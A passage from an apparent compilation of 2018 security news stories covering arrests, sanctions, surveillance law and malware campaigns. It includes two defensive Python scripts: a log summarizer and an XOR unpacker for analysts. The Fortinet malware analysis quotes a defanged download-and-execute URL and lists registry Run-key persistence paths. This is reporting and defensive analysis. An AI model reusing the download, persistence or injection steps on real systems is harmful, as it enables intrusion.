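    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+) kind=(?P<kind>recon|exploit)$"
)


def parse_events(text):
    """Parse the constructed log format; malformed lines are dropped, not raised."""
    events = []
    for line in text.splitlines():
        match = LINE.match(line.strip())
        if match is None:
            continue
        event = match.groupdict()
        event["dport"] = int(event["dport"])
        events.append(event)
    return events


def summarize(events):
    """Aggregate the way the F5 write-up reports its numbers: by country, by port,
    recon share, SIP-to-Telnet ratio and the busiest hour of the window."""
    total = len(events)
    by_country = Counter(e["cc"] for e in events)
    by_port = Counter(e["dport"] for e in events)
    hourly = Counter(datetime.fromisoformat(e["ts"]).strftime("%Y-%m-%dT%H") for e in events)
    recon = sum(1 for e in events if e["kind"] == "recon")
    return {
        "total": total,
        "by_country": by_country,
        "by_port": by_port,
        "country_share": {cc: n / total for cc, n in by_country.items()} if total else {},
        "recon_share": recon / total if total else 0.0,
        "port_ratio_sip_to_telnet": by_port[5060] / by_port[23] if by_port[23] else None,
        "busiest_hour": hourly.most_common(1)[0] if hourly else None,
    }


def is_spike(observed, baseline, factor=1.5):
    """True when observed volume is at least `factor` times the baseline
    (assumed threshold: 50% above normal, as in the Netscout figure on this page)."""
    return observed >= baseline * factor


if __name__ == "__main__":
    summary = summarize(parse_events(SAMPLE_LOG))
    print("events:", summary["total"], "recon share: %.0f%%" % (100 * summary["recon_share"]))
    print("top sources:", summary["by_country"].most_common(3))
    print("top ports:", summary["by_port"].most_common(3))
    print("busiest hour:", summary["busiest_hour"])
    print("spike vs baseline of 4/hour:", is_spike(summary["busiest_hour"][1], 4))
```

The two numbers a defender actually acts on are the recon share (a scan-heavy window means exposure is being mapped, not yet exploited) and the busiest hour against a per-target baseline; country attribution from source IP is the weakest signal here, which is exactly the caveat F5 attaches to its own conclusion.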

French Nationals Arrested for 'Rex Mundi' Hacks
16.6.18 securityweek BigBrothers

Europol announced this week that several French nationals were arrested in the past year on suspicion of being involved with Rex Mundi, a group that hacked into the systems of several organizations and attempted to blackmail them.

According to Europol, the alleged members of the hacker group were identified after they targeted a UK-based company in May 2017. The cybercriminals stole significant amounts of customer data from the firm and demanded the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not making the stolen files public, or more than €825,000 ($776,000) for information on how the attack was carried out. The hackers also told the victim that the amounts would increase by €210,000 ($240,000) for each day the payment was delayed.

After the victim reported the attack to law enforcement, the UK’s Metropolitan Police, the French National Police and Europol teamed up to identify the hackers. “Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol said.

Five suspects were arrested in June 2017, two were arrested in October 2017 and one was apprehended on May 18, 2018. All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The individual who was arrested last month by the Royal Thai Police is a 25-year-old developer. The suspects arrested in October 2017 were described as “hackers.” The “main suspect,” as Europol describes him, admitted blackmailing companies, but claimed to have used the dark web to hire someone to conduct the hacking.

Rex Mundi was active since at least 2012 and until 2015 it made many of its operations public in hopes of convincing victims to pay up. Its victims included AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE). Many of the hacker group’s victims were Belgian companies.

European Parliament Votes to Ban Kaspersky Products
14.6.18 securityweek BigBrothers  

Kaspersky Suspends Collaboration With Europol and NoMoreRansom

Kaspersky Lab has suspended its collaboration with Europol and the NoMoreRansom initiative after the European Parliament passed a resolution that describes the company’s software as being “malicious.”

Kaspersky is not trusted by some governments due to its alleged ties to Russian intelligence, which has sparked concerns that the company may be spying for Moscow.

The call for a ban on Kaspersky’s products in the European Union is part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

The next-to-last proposal in the report “Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.”

The resolution was approved with 476 votes in favor and 151 against. In response, Kaspersky Lab’s founder and CEO, Eugene Kaspersky, said his company would be freezing collaboration with Europol and the NoMoreRansom project, and highlighted that the EU’s decision “welcomes cybercrime in Europe.”

Kaspersky is one of the private sector companies that founded NoMoreRansom, and it has helped Europol in several major cybercrime investigations, including a $1 billion cyber-heist.

“[It is] frustrating that there was no investigation, no evidence of any wrongdoing from our side, just references to false allegations from anonymous sources. This is the essence of media-ocracy: fake news → political decisions,” Eugene Kaspersky said on Twitter. “The risks of using our software are purely hypothetical. Just as hypothetical as with any other cybersecurity software of any country. But the risk of becoming a victim of a genuine cyberattack is real – and extremely high. Ergo: EP's political decision plays *for* cybercrime.”

Interestingly, an answer given in April by the European Commissioner for Digital Economy and Society, Mariya Gabriel, in response to a question from Polish politician Anna Fotyga regarding the risks associated with the use of Kaspersky software states that “the Commission has no indication for any danger associated with this anti-virus engine.”

On the other hand, Paet says he stands by his report. “These decisions must be taken seriously, they have not been taken out of the blue but instead have been drawn from various partners and intelligence sources. Considering the overall situation of EU-Russia relations, and Russia’s aggressive behaviour, we should not be taking risks that could cause serious damage to the EU,” he told EURACTIV after the vote.

The report is not legally binding, but it could influence some EU member states, especially since the U.K., the Netherlands and Lithuania have already moved to ban the use of Kaspersky software on sensitive systems. Kaspersky took legal action in the United States in an effort to overturn a decision to prohibit the use of its products by government agencies, but a judge rejected the lawsuit.

Many in the cybersecurity industry are skeptical of the accusations against Kaspersky, especially since no evidence of wrongdoing has been provided and many decisions related to the company appear to be based on media reports.


The security firm has been trying to clear its reputation, first by launching a transparency initiative that included giving partners access to source code, and more recently by announcing a move of core processes from Russia to Switzerland.

DHS HART Biometric Database Raises Security, Civil Liberties Concerns
13.6.18 securityweek BigBrothers

Protecting the DHS HART National Biometric Database Against Theft and Abuse

In February 2018, Northrop Grumman Corporation announced that it had been awarded a $95 million contract to develop increments one and two of the Department of Homeland Security (DHS) Homeland Advanced Recognition Technology (HART) system.

The announcement said very little about HART, except that it is a "multi-modal processing and matching technology that uses a combination of face, finger and iris biometrics meeting DHS accuracy requirements." It is a database and system designed to incorporate, expand and replace the existing Automated Biometric Identity System (IDENT) built in the 1990s.

Last week the Electronic Frontier Foundation (EFF) provided more information on HART. In a Deeplinks blog, senior staff attorney Jennifer Lynch explained, "The agency's new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics -- from face recognition to DNA, data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments."

HART will support, she expands, "at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for 'other modalities'. It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to be highly subjective, including information collected from officer 'encounters' with the public and information about people's 'relationship patterns'."

EFF's primary concern over this vast new database of DNA, physical biometrics and social behavior is what it describes as the chilling effect on people exercising their First Amendment-protected rights to speak, assemble and associate. "Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings," she writes.

Through EFF's understanding of the HART project and its concern over civil liberties, we now know more about the DHS biometric database. But there are other concerns beyond civil liberties. Security for this vast trove of the nation's most personal information is never mentioned. Indeed, Northrop Grumman's contract announcement merely states, "A keen focus on safeguarding personally identifiable information as well as ensuring the critical sharing of data across interagency partners underpins the technology."

But government does not have a good track record in securing the data it holds. In 2015, the Office of Personnel Management lost personal information on 21.5 million people to what is generally believed to be Chinese government-sponsored hackers.

In 2010, Chelsea Manning (born Bradley Manning) leaked 750,000 classified or sensitive military and diplomatic documents to WikiLeaks, including the infamous 'collateral murder' Baghdad airstrike video.

In 2013, Edward Snowden exfiltrated and leaked thousands of classified NSA documents exposing NSA and GCHQ clandestine global surveillance programs.

In 2016, the hacking group known as The Shadow Brokers leaked a series of exploits stolen from the Equation Group – believed to be the Tailored Access Operations (TAO) unit of the NSA. One of these exploits, EternalBlue, was used in both the WannaCry ransomware and NotPetya cyberattacks of 2017.

In March 2017, WikiLeaks began publishing a series of CIA classified documents and cybersecurity exploits under the name Vault 7.

These incidents demonstrate that government databases have historically been susceptible to both external hacks and insider breaches. However, the extent to which the HART database will become a magnetic target for hackers is conjecture, and not universally agreed.

Joseph Carson, chief security scientist at Thycotic, doesn't believe the database will be very attractive to hackers. "The only reason this would be attractive to cybercriminals," he told SecurityWeek, "would be to sell it onwards to nation states who would use such data for intelligence or economic advantages. However, the data alone would not be as valuable without the technology that analyzes the metadata for matches and relationships. So, cybercriminals and nation states would need to compromise both to make value of the stolen data."

Others take a different view. "This massive, aggregated database will represent an incomparable trove of intelligence about US citizens. You can be sure it will be a target," said Rick Moy, CMO at Acalvio.

Migo Kedem, director of product management at SentinelOne, adds, "There will be many criminals and states who would like to get their hands on this type of information, ranging from commercial and marketing, through business espionage to state level."

Protecting this database from external hackers, whether organized crime or nation states, is going to be a challenge. But it will be equally difficult to protect it from insiders. According to the EFF's figures, the IDENT fingerprint database already holds data on 220 million individuals, and processes 350,000 fingerprint transactions every day. The full HART database will go far beyond just fingerprints, and will be shared with federal agencies outside of DHS, with state and federal law enforcement, and even with foreign governments.

The ability to control everybody with access to the database will consequently be another challenge – health workers and policemen already covertly query their own databases to provide information for worried friends and relatives. The temptation to check on the relationship patterns of a daughter's new boyfriend – if possible – is just one danger. Looking at private industry, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek, "Data protection is certainly a high priority in large companies such as Google or Apple, but as we recently saw with Facebook – authorized third-parties are the uncontrollable Achilles' heel."

The subversion of authorized users through bribery, blackmail or stolen credentials is another difficulty. "When human interactions are involved, it is generally the easiest link to compromise," says SentinelOne's Kedem.

Just as securing access to the HART database will be difficult, so too will be securing the use of the database. While it can provide value to its users manually, there is little doubt that machine learning and artificial intelligence will be used to help locate the needles in this massive haystack. This is particularly concerning because of the intention to include 'relationship patterns', which will be more easily sifted with AI than with manual searches.

Indeed, it is tempting to wonder if HART will become the basis for the FBI's often-promised move into 'predictive policing'. Thycotic's Carson believes this is probable. "This goes way back," he said. "'Trapwire' was exposed by Wikileaks back in 2012 resulting from the Stratfor hacks. It reportedly used CCTV surveillance to recognize people from their facial biometrics, how they walked and even from the clothing they wear. The purpose of such technology was prioritized for national security and it has been known that such technology had existed; but this was a clear indication that it was formerly in use. However, it is now clear that such data is being used beyond national security in both government and commercial use for profit and control."

Acalvio's Rick Moy simply said, "Predictive models need tons of data, so it would certainly be an enabler."

But this brings us to the next problem: false positives potentially generated by built-in bias in the artificial intelligence algorithms. Carson is not too concerned: "I would assume the results would have to be verified by a human. The AI and machine learning is typically to find the needle in a haystack and a human is used to validate the results."

Moy, however, does have concerns. "False positives come with any algorithm based on diverse data inputs. Bias is a human trait, and humans are still writing the algorithms. But it's worth noting that there's quite a difference between searching for known features of a past incident versus asking a system what the most relevant features of an incident were, versus predicting who will commit a future crime."

The implication is that use of the HART database to identify suspects is likely to be very accurate; but its use to predict criminal, terrorist or simply anti-social behavior would be worrying. If there is a bias against certain ethnic groups for, say, criminal or terrorist activity within society and existing records, that bias can potentially be transferred to the AI algorithms resulting in damaging and far-reaching false positives.

"US Congress needs to look at the old adage of 'we could, but should we?' while going forward with the DHS HART database," comments Abhishek Iyer, Technical Marketing Manager at Demisto. "AI and ML algorithms often mirror and amplify the biases of the data collected. If DHS investigation will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources."

There is little doubt that a national biometric database could help law enforcement. But at what cost? The Electronic Frontier Foundation fears it will damage freedom of speech and association, and massively impinge upon personal privacy. But the challenges posed by HART go beyond civil liberties. Securing both access to and use of the data is going to be very difficult.

North Korean Hackers Abuse ActiveX in Recent Attacks
12.6.18 securityweek  BigBrothers

An ActiveX zero-day vulnerability discovered recently on the website of a South Korean think tank focused on national security has been abused by the North Korean-linked Lazarus group in attacks, AlienVault reports.

ActiveX controls are usually disabled on most systems, but the South Korean government requires them to be enabled on machines in the country. This has led to numerous attacks abusing ActiveX to compromise systems in South Korea, with many of the attacks attributed to North Korean hackers.

The same applies to the newly observed attacks, where JavaScript code was used to exploit various ActiveX vulnerabilities, including a zero-day. Soon after the attacks occurred, local media attributed them to the Andariel gang, which is said to be part of Lazarus, the state-sponsored hacking group considered the most serious threat against banks.

Also referred to as BlueNoroff, the group has orchestrated high profile attacks such as the devastating attack against Sony Pictures in late 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. This year, the actor supposedly switched targets to cryptocurrency, but also hit an online casino in Central America.

According to a new AlienVault report, the Lazarus hackers were behind the recently revealed ActiveX attacks as well.

The group used a profiling script as the initial reconnaissance tool, in an attempt to gather information on possible targets. Although this is a tactic the Lazarus group has employed before, other threat actors use it as well.

The next step of the attack involved scripts capable of gathering additional information from the system and designed to deliver the ActiveX exploit.

In a tweet several weeks ago, Cyber Warfare Intelligence Center and IssueMakersLab founder Simon Choi shared some details on the scripts used in the assault, revealing that an initial reconnaissance stage was deployed in January 2017, while script injections only occurred in late April 2018.

The script was designed to identify the browser and operating system running on the victim’s machine and borrows much of the code from PinLady’s Plugin-Detect. When detecting Internet Explorer on a machine, the script checks if ActiveX is enabled, as well as plugins running (from a specific list of ActiveX components).

AlienVault also notes that one of the other scripts involved in the attack, apparently used for profiling, sends data to a website that might have been compromised a while back, as it was previously recorded as a command and control (C&C) server for Lazarus malware in 2015.

The ActiveX exploit used in the recent assault, also shared by Simon Choi on Twitter, was meant to download malware from peaceind[.]co.kr and save it to the system as splwow32.exe.

“Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable,” AlienVault says.

The malware appears to be called Akdoor, a simple backdoor designed to execute commands using Command Prompt. The malware also uses a “distinctive command and control protocol,” the security researchers say.

U.S. Blacklists Russian Firms Tied to FSB Hacking Ops
12.6.18 securityweek BigBrothers

The United States placed five Russian companies and three individuals on its sanctions blacklist Monday for allegedly supporting the FSB intelligence agency's hacking operations, including a firm involved in subsea operations.

The US Treasury named Digital Security and two subsidiaries as helping develop offensive cyber capabilities for Russian intelligence services, including the already-sanctioned FSB.

The Kvant Scientific Research Institute was also included on the blacklist, as a state enterprise supervised by the FSB.

In addition, Divetechnoservices and three officials of the firm were sanctioned for supplying and supporting the government's underwater capabilities in monitoring and hacking subsea communications cables around the world.

US officials have become alarmed over the past year at the extent of US-targeted offensive cyber operations that Washington alleges have official backing from Moscow.

Those include the global NotPetya cyber attack, which paralyzed thousands of computers around the world last year; intrusions into the control systems of the US energy grid; and the insertion of trojans into home and company networking devices around the world, which allow both the diversion of data and attacks that could shut down networks.

The sanctions freeze property and assets under US jurisdiction and seek to lock those named out of global financial networks.

Vietnam MPs Approve Sweeping Cyber Security Law
12.6.18 securityweek BigBrothers

Vietnamese lawmakers on Tuesday approved a sweeping cyber security law which could compel Facebook and Google to take down critical posts within 24 hours, as space for debate is crushed inside the Communist country.

Activists and dissenters are routinely harassed, jailed or tied up in legal cases in Vietnam, a one-party state which is hyper-sensitive to critical public opinion.

Social media and Internet forums have provided a rare platform to share and debate views against authorities.

But the bill, waved through by an overwhelming majority of MPs in the National Assembly, is poised to end that relative freedom.

The law's far-reaching provisions mean internet companies will have to remove posts deemed to be a "national security" threat within a day and store personal information and data of their users inside Vietnam.

"Currently, Google and Facebook store personal data of Vietnamese users in Hong Kong and Singapore," Vo Trong Viet, chairman of National Assembly's defence and security committee told lawmakers.

"Putting data centres in Vietnam will increase expenses for the service providers... but it is necessary to meet the requirements of the country's cyber security."

The new law outlaws material encouraging public gatherings or that "offends" everything from the national flag to the country's leaders and "heroes".

There was no immediate detail of the punishment for violating the new rules.

Only 15 out of the 466 MPs present in the rubber-stamp assembly voted against the bill, which the government says will become law from January 1, 2019.

Rights advocates said it further shrinks the small space for debate.

"In the country's deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities," said Clare Algar of Amnesty International.

"With the sweeping powers it grants the government to monitor online activity, this vote means there is now no safe place left."

The Asia Internet Coalition, an advocacy group acting on behalf of Facebook, Google, Twitter and other tech firms in the region, said it was "disappointed" by the assembly's vote.

"Unfortunately, these provisions, will result in severe limitations on Vietnam's digital economy, dampening the foreign investment climate and hurting opportunities for local businesses and SMEs to flourish inside and beyond Vietnam," said Jeff Paine, managing director of the internet coalition.

The country's conservative leadership, which has been in charge since 2016, is waging a crackdown on activists and dissidents.

At least 26 dissidents and activists have been prosecuted during the first five months of this year, according to Human Rights Watch.

The government has also unveiled a 10,000-strong brigade to fight cybercrimes and "wrongful views" on the internet, according to state media reports.

The unit, dubbed Force 47, is also tasked with fighting anti-state propaganda on the web.

Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams
12.6.18 securityaffairs BigBrothers

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.
On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The authorities conducted the investigation for over six months. 42 suspects have been arrested in the United States and 29 in Nigeria, with the remaining arrests in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to recover roughly $14 million in fraudulent wire transfers.

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.”


During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters.

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. In one case the suspects tricked a real estate closing attorney into wiring $246,000 to their account.

According to a report published by TrendMicro, the damage caused to enterprises by Business Email Compromise (BEC) attacks has grown over the past years, and it is estimated that it could reach $9 billion in 2018. This rising value of loss for business takes into account new attack vectors, such as the Dark Caracal campaign attributed to a Lebanese intelligence agency, which uses malicious Android applications.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing social engineering to lure and deceive employees in a myriad of scams to bypass security measures. By relying on a deep understanding of human psychology, hackers are circumventing the defenses; as the report states, “it requires little in the way of special tools or technical knowledge to pull off, instead requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: bogus invoice scheme, CEO fraud, account compromise, attorney impersonation and data theft. The report highlights that these attacks can be classified into two major groups: credential grabbing and email only.

In the analysis of losses caused by crimes reported in the FBI 2017 Internet Crime Report, a document that outlines cybercrime trends over the past year, BEC/EAC ($676,151,185) is the most prominent category, followed by Confidence Fraud/Romance ($211,382,989) and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”

Crooks used multi-stage attacks aimed at Russian Service Centers
12.6.18 securityaffairs BigBrothers

Fortinet recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.
Security researchers from Fortinet have recently spotted a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

Experts highlighted that the hackers conducted multi-stage attacks, but excluded the involvement of a nation-state actor.

Attackers leveraged spear-phishing messages using weaponized Office documents exploiting the 17-year-old MS Office flaw CVE-2017-11882, which was addressed by Microsoft updates in October.

The first attacks were observed at the end of March when crooks sent spear-phishing emails to a service company that repairs Samsung’s electronic devices.

The messages were written in Russian and contained a file named “Symptom_and_repair_code_list.xlsx”.


“FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.” reads the post published by Fortinet.

“A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.”

Experts noticed that the content of the email was the result of a machine translation. Analyzing the headers of the email, the experts discovered that the IP address of the sender was not associated with the domain in the “From” field.

The attackers used a different XLSX file for each email. The embedded shellcode performs various tasks to resolve the LoadLibraryA and GetProcAddress functions, which allow it to locate the APIs it needs to execute the final payload.

“The two most important functions “imported” by the shellcode are: URLDownloadToFileW and ExpandEnvironmentStringsW.” continues the analysis.

“The purpose of the first one is obvious. The last function is used to determine the exact location where the shellcode should store downloaded payload, since this location will be different under different platforms. Finally, Shellcode downloads a file from the URL: hxxp://brrange.com/imm.exe, stores it in %APPDATA%\server.exe, and then tries to execute it.”

The final payload uses multiple-layer multi-packer protection to avoid detection.

The first stage implements the first layer of protection, the popular ConfuserEx packer, which obfuscates object names as well as names of methods and resources.

The resources are used to determine the next stage payload, which is encrypted using DES, and executes the decrypted file named BootstrapCS that represents the second stage of the multi-layer protection.

BootstrapCS is not obfuscated, but it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

These checks are essential to avoid the code being executed in a virtualized environment; the stage also searches for and shuts dow… It also writes the payload path to the following startup registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]

Stage 3 of the payload is a binary resource named mainfile, which carries the third level of packing protection: a simple XOR algorithm with the single-byte key 0x20 was used for encryption.

Once the payload is decrypted payload it is injected into a process based on the value in the settings resource file.
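The third packing layer described above is a single-byte XOR, which an analyst can strip without knowing the key in advance: XOR every candidate key over the blob and keep the one that yields a valid PE header. The following Python script is an added example written for this page, not Fortinet’s code or the malware’s; the packed sample it operates on is a constructed, minimal PE-shaped buffer, and `recover_key` generalizes the report’s fixed key of 0x20 to any single-byte key.

```python
"""
Analyst-side unpacker for a single-byte-XOR packed stage such as the
'mainfile' resource described in the Fortinet report.
Added example for this page; the sample data is constructed, not a real binary.
"""
from __future__ import annotations

import struct

# The report states stage 3 was XOR-encrypted with KEY = 0x20.
REPORTED_KEY = 0x20


def xor_decode(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR to every byte of `data` (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data: bytes) -> bool:
    """Cheap structural check: 'MZ' DOS header and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_key(blob: bytes) -> int | None:
    """Brute-force all 256 single-byte keys; return the one that yields a PE, else None.

    Generalizes the report's fixed key: the same check works when the key is unknown.
    """
    for key in range(256):
        if looks_like_pe(xor_decode(blob, key)):
            return key
    return None


def build_sample_pe(size: int = 0x100) -> bytes:
    """Construct a minimal PE-shaped buffer (constructed test data, not a real executable)."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)  # e_lfanew -> PE signature at offset 0x80
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# Constructed sample: the fake PE packed the way the report describes (XOR 0x20).
SAMPLE_PACKED = xor_decode(build_sample_pe(), REPORTED_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_PACKED)
    if key is None:
        print("no single-byte XOR key produced a PE image")
    else:
        unpacked = xor_decode(SAMPLE_PACKED, key)
        print(f"recovered key {key:#04x}; unpacked image starts with {unpacked[:2]!r}")
```

On a real resource you would feed `recover_key` the raw `mainfile` bytes and write the decoded buffer to disk for further static analysis; the header check is deliberately loose so it also flags images whose later sections are damaged.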

Stage 3 of the payload resolves to a commercial Remote Administration Tool (RAT) dubbed Imminent Monitor. At stage 4, the security researchers once again encountered the ConfuserEx packer.

The Imminent Monitor RAT includes five modules that allow the malicious code to control the victim’s machine, including the webcam.

The analysis of the C&C servers revealed 50 domains registered by the attackers on the same day, some of them were used by crooks to deliver malware, while others were involved in phishing attacks. The experts also discovered older .XLSX samples that exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” concludes Fortinet.

Further details are included in the IoCs section of the report.

Multi-Stage Attacks Target Service Centers in Russia

11.6.18 securityweek   BigBrothers

Fortinet security researchers recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

The attacks stand out because of their multi-staging and are believed to have been launched by a non-Russian actor. The attackers used spear-phishing emails and malicious Office documents exploiting CVE-2017-11882, a 17-year-old vulnerability in Office’s Equation Editor that Microsoft manually patched in October last year.

The targeted attack started at the end of March with spear-phishing emails received at a service company that repairs Samsung’s electronic devices. Pretending to come from representatives of Samsung, the emails specifically targeted this organization, were written in Russian, and contained a file named Symptom_and_repair_code_list.xlsx, related to the targeted company’s profile.

The emails were likely the result of machine translation, instead of being created by a native Russian speaker, the security researchers reveal. Furthermore, the headers of the email revealed that the IP address of the sender wasn’t related to the domain in the “From” field.

The attackers used different attachments for each email, but all messages had seemingly legitimate .XLSX files attached. Furthermore, all of the documents contained an exploit for the CVE-2017-11882 vulnerability.

The shellcode used in the attacks was meant to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload. It also imports other functions, including one used to determine the exact location where the downloaded payload should be stored.

The payload features multiple-layer multi-packer protection, starting with an initial layer where the well-known ConfuserEx packer was used to obfuscate object names, along with the names of methods and resources. From these resources, it reads the next stage payload, which is encrypted using DES, and executes the decrypted file.

The decrypted file, named BootstrapCS, is the second stage of the multi-layer protection. While not obfuscated, it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This stage can check for various emulation, sandbox, and virtual machine tools, and also searches for and shuts down specified processes, in addition to disabling system utilities. It also writes the payload path to startup registry keys, hides the file with system and hidden attributes, and injects the payload in various processes.

A binary resource named mainfile is the encrypted stage 3 of the payload. It is an executable that represents the third level of packing protection: a simple XOR algorithm with the KEY = 0x20 was used for encryption. The decrypted payload is injected into a process based on the value in the settings resource file.

Stage 3 of the payload references a commercial Remote Administration Tool (RAT) called Imminent Monitor, which can be purchased by anyone directly from the app developer (who apparently prohibits the malicious use of the program). At stage 4, the security researchers once again stumbled upon ConfuserEx.

The main payload of the attack, however, turned out to be the commercial version of the Imminent Monitor RAT, which includes five modules to record videos using the victim’s webcam, to spy on victims, and to control their machines.

The command and control (C&C) servers used in these attacks led the researchers to discover 50 domains registered on the same day, some of which were used to spread malware, while others for phishing attacks. The researchers also discovered older .XLSX samples that use the same C&C but attempt to exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” Fortinet concludes.

Former GCHQ chief Hannigan warns of Russia’s aggressive approach to the cyberspace

11.6.18 securityaffairs  BigBrothers

According to the former GCHQ chief, the recently discovered VPNFilter botnet is a demonstration that Russia appears to be live-testing cyberattacks.
Former GCHQ chief Robert Hannigan has warned that the availability of hacking tools in the main marketplaces is rapidly changing the threat landscape. Hannigan served as the director of the UK intelligence agency from November 2014 until January 2017.

Threat actors have easy access to attack tools even without specific expertise.

Hannigan gave a keynote speech titled “Weaponising the web: Nation-state hacking and what it means for enterprise cybersecurity” at the Infosec conference in London last week.

Hannigan highlighted the risks associated with operations conducted by nation-state actors, which have dramatically increased over the last five years.

State-sponsored hackers pose a serious risk for enterprises as well as governments; the former GCHQ chief warned of government APT groups using crime gangs as proxies, which makes attribution harder.

“Nation state attacks using criminal group as a proxy” is a “fairly new issue.” Hacking tools are becoming a commodity for threat actors and represent a problem for companies.

Hannigan mentioned the activity conducted by North Korea-linked APT and Iranian state-sponsored hackers.

North Korean APT groups, like the infamous Lazarus APT crew, have focused their activity on the SWIFT network as well as on crypto exchanges in order to steal funds.

“This is a rational state pursuing rational objectives,” explained Hannigan.

Hannigan also warned of the intensifying activity of Iranian hackers, who have likewise targeted financial institutions.

Which is the greatest threat?

Russia, of course! Russia-linked APT groups are very sophisticated and continuously target infrastructure worldwide. In some cases they have demonstrated destructive capabilities, as in the attacks against the Ukrainian power grid.


According to Hannigan, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.

“It’s unclear if that was a mistake or an experiment,” Hannigan said. “Russia seems to be live testing things in cyber, as it has been [on the ground] in Syria, but it’s a doctrine we don’t fully understand.”

The former spy chief highlighted the risks associated with state-sponsored malware like WannaCry, which caused billion-dollar damages to organizations worldwide and severe problems for critical infrastructure, such as hospitals in the UK.

“The problem is that the risk of miscalculation is huge,” Hannigan warned.

Search Engines in Russia cannot link to banned VPN services and Internet proxy services
10.6.18 securityaffairs BigBrothers 

Russia strengthens online censorship by announcing fines for search engines that link to VPN services banned in the country.
